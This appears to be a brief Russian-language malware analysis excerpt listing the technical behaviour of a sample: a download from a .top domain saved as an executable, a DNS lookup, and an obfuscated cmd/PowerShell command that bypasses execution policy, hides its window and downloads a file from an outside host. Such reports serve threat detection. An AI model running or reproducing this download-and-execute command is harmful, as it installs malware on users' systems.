Техническая информация
- http://www.doorasope.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^Wer^sHe^LL^.ex^e -ex^eC^ut^IO^NPOlICy b^y^p^A^S^S^ -N^O^p^rOfile^ -WInDOWSty^L^E H^I^d^de^N^ (nEw^-oB^JEC^t S^YsT^eM^.nE^T.W^eBC^l^Ien^t)^.^DO^WNL^Oa^DFil^E('http://www.d...
- DNS ASK do###sope.top
- '<SYSTEM32>\cmd.exe' /C "p^o^Wer^sHe^LL^.ex^e -ex^eC^ut^IO^NPOlICy b^y^p^A^S^S^ -N^O^p^rOfile^ -WInDOWSty^L^E H^I^d^de^N^ (nEw^-oB^JEC^t S^YsT^eM^.nE^T.W^eBC^l^Ien^t)^.^DO^WNL^Oa^DFil^E('http://www.d...' (со скрытым окном)